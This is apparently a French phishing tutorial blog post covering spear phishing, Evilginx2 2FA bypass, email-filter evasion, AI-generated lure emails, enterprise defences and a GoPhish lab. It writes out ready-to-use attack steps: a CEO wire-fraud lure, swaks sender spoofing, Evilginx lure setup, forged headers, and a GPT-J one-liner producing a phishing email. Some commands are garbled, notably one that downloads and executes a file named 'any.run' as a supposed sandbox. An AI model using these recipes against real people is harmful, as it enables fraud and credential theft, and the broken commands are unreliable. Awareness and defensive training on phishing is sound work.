🎯 Le phishing, c’est l’art de piéger les humains – et voici comment le maîtriser ou s’en protéger
Plongée technique dans l’ingénierie sociale, l’exploitation des failles humaines et les contre-mesures enterprise. Depuis Kali Linux, on va décortiquer les attaques, les simuler, et les contrer comme des pros.
1️⃣ Épidémiologie du Phishing : Statistiques et Impact Business
🔍 Chiffres Clés 2023 (Verizon DBIR, IBM X-Force)
- ⏱️ 1 attaque toutes les 11 secondes – Coût moyen : $4.9M
- 📈 +65% sur les SaaS (Microsoft 365, Google Workspace)
- 🎯 73% des ransomwares via phishing
🧠 Psychologie de la Manipulation (Cialdini Inside)
- 🚨 Urgence : "Compte suspendu dans 24h !"
- 🤝 Autorité : Email spoofé du PDG
- 🎁 Réciprocité : "Offre exclusive pour vous"
2️⃣ Typologie des Attaques : Du Spray-and-Pray au Spear Phishing
🎯 2.1. Spear Phishing (Ciblage Entreprise)
Exemple : Email spoofé au CFO :
From: "CEO Name"# Spoof via Kali Subject: Transfert urgent - Acquisition "Bonjour [Prénom], réunion en cours, virement urgent 450k€ vers IBAN FR76..., confirmez sous 1h."
🔍 Technique sous Kali :
# OSINT avec theHarvester
theHarvester -d company.com -b linkedin -f result.html
# Envoi via swaks
swaks --to cfo@company.com --from ceo@company.com --server smtp.company.com --body "virement.txt"
🔗 2.2. Chain-Based Phishing
- 1️⃣ Email avec macro Word
- 2️⃣ Exfiltre les contacts Outlook
- 3️⃣ Auto-propagation
🌐 2.3. Evilginx MITM Avancé
Bypass 2FA avec Evilginx sous Kali :
# Installation
git clone https://github.com/kgretzky/evilginx2
cd evilginx2 && sudo python3 setup.py install
# Configuration
evilginx2
phishlet hostname o365 'login.microsoftonline.com'
lures create o365
→ Capture des tokens même avec 2FA.
📊 Tableau Récapitulatif
| Type | Difficulté | Outils | Cibles |
|---|---|---|---|
| Spray-and-Pray | Facile | SMTP massif, SET | Grand public |
| Spear Phishing | Moyen | theHarvester, swaks | Cadres, employés spécifiques |
| Evilginx MITM | Avancé | Evilginx2, DNS spoofing | Utilisateurs SaaS |
3️⃣ Techniques Offensives : Au-Delà du Clonage Basique
📧 3.1. Bypass des Filtres Email
- 🛠️ Outil sous Kali : SPF-Exploit
git clone https://github.com/tatanus/SPF-Exploit
cd SPF-Exploit
python3 spf_exploit.py -d company.com
echo "Received: from [192.168.1.1] (helo=legit.company.com)" > headers.txt
msmtp --file=headers.txt -t cfo@company.com
🤖 3.2. Phishing par IA Générative
- 💬 Deepfake Vocal : ElevenLabs via API
- 📝 Script Kali avec GPT-like :
# Installation d’un modèle local (ex. Grok via xAI ou GPT-J)
pip3 install transformers
# Génération d’email avec Hugging Face
python3 -c "from transformers import pipeline; gen = pipeline('text-generation', model='EleutherAI/gpt-j-6B'); print(gen('Rédige un email urgent en français de la DRH pour une prime, lien vers formulaire bancaire : ')[0]['generated_text'])"
# Résultat : Email crédible + lien bit.ly masqué
→ Ajoutez curl -L bit.ly/phishform pour simuler le lien.
4️⃣ Cyberdéfense Enterprise : Stratégies en Profondeur
🛡️ 4.1. Stack Technologique
- 🔗 Email : Mimecast + Proofpoint
- 🌐 Web : Zscaler
- 🔐 Auth : FIDO2
🕵️ 4.2. Analyse Forensique
- Vérifier en-têtes :
cat phishing.eml | grep "Received"
- Extraire URLs :
strings phishing.eml | grep -i http
- Sandbox :
wget any.run && chmod +x any.run && ./any.run phishing.eml
5️⃣ Cadre Juridique et Conformité
- 🇪🇺 RGPD : 4% du CA
- 🇺🇸 CFAA : 10 ans max
- 🔐 NIS 2 : Report sous 24h
6️⃣ Lab : Simulation avec GoPhish
# Installation sous Kali
sudo apt update && sudo apt install gophish
# Lancement
gophish -http :80 -admin :3333
# Config via navigateur : https://localhost:3333
📈 Metrics : Taux d’ouverture, clics, heatmaps
Ressources Recommandées :
- 📚 "Phishing Dark Waters" – Hadnagy
- 🔗 eCXD (eLearnSecurity)
- 🛠️ MITRE ATT&CK (T1566)